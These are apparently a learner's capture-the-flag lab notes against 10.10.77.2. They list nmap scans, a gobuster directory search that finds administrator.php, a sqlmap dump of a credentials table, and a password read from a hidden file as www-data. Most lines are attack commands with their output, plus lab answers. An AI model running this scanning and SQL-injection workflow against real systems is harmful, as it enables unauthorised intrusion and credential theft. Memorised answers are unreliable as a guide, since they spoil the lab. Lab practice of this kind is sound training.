
Task2:

1.
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

2.
nmap -sV -sC 10.10.77.2

----> http-title: Apache2 Ubuntu Default Page: It works


3.
nmap 10.10.77.2--open -sV

---> OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

4.
nmap -sV --script=http-headers 10.10.77.2

---> Apache/2.4.18


Task3:

1.
gobuster dir -u http://10.10.77.2:80 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -x php,txt,html

-----> administrator.php

Task4:

1.

sqlmap -u http://10.10.77.2/administrator.php --forms --dump

+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+


Task5:

www-data@ubuntu:/var/hidden$ cat pass

---->pass:  pinguapingu


